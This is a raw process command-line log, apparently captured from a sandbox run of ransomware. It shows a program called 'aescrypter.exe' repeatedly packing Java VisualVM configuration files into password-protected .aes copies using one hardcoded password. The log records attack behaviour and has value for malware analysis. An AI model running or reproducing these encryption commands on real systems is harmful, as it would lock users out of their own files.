"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-windows.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-windows.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-applemenu.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-applemenu.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-cli.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-cli.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup-impl.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup-impl.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-favorites.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-favorites.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-javahelp.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-javahelp.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-fallback.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-fallback.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-keymap.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-keymap.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-print.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-print.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-queries.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-queries.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sampler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sampler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sendopts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sendopts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-settings.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-settings.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-spi-actions.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-spi-actions.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-uihandler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-uihandler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-outline.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-outline.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-actions.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-actions.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-compat.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-compat.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-dialogs.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-dialogs.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-execution.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-execution.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-explorer.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-explorer.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-io.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-io.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-loaders.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-loaders.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-modules.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-modules.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-nodes.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-nodes.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-options.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-options.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-windows.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-windows.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-charts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-charts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-common.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-common.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-snaptracer.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-snaptracer.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-common.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-common.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-heapwalker.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-heapwalker.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-oql.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-oql.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-utilities.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-utilities.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-api-caching.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-api-caching.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
